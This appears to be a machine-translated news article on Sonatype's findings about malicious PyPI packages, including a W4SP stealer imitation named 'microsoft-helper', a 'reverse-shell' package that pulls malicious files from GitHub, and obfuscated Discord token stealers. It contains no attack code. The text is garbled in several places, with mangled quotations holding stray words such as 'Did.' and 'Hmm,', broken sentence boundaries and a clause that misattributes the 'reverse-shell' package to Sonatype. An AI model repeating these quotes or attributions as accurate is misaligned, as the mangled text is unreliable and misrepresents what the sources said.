Security vendor Sonatype detected 6,933 malicious open source packages in March alone, bringing the total number detected since 2019 to 115,165.
The infostealer consisted of quite a few of these malicious components, including imitations of the popular W4SP stealer, such as “microsoft-helper” by its self-proclaimed author “idklmao”.
“The name of the package, microsoft helpera malicious person may be trying to disguise its malice, possibly adding it as a dependency to a popular package that they already own,” explains Sonatype. Did.
“But the author’s name, composed of abbreviations, did not even pretend to be that of the correct author.”
The malicious package contains a second-stage payload, which Sonatype says allows for more flexibility in attack, as it means the attacker can more easily modify the code without having to start from scratch. says.
For more information on open source supply chain risks, see Researchers Uncover 700+ Malicious Open Source Packages.
Unlike “microsoft-helper”, the authors of the “reverse-shell” package Sonatype, which was discovered last month, made no attempt to hide their intentions.
It stands for Malware as a Service (MaaS) for the Spanish market and hosted malicious files on GitHub.
“The package ‘reverse-shell’ doesn’t look malicious at first glance, but the file it executes from GitHub, ‘bypass.py’ and the resulting ‘WindowsDefender.py’, is nothing less than malicious. Hmm,” Bender explained.
“By hosting malicious files in public repositories, bad actors have more control over the files, which allows them to remove, upgrade, or even version control their payloads.”
Finally, Sonatype highlighted two highly obfuscated packages, ‘proxier-api’ and ‘nitro-api66’, designed to steal Discord tokens.
All of the above were found in the Python Package Index (PyPI) repository.
“These types of packages are cause for concern because they pose a serious threat to developers who might inadvertently download and install them,” the vendor argued. and reported it to the PyPI team, who removed it quickly and skillfully.”
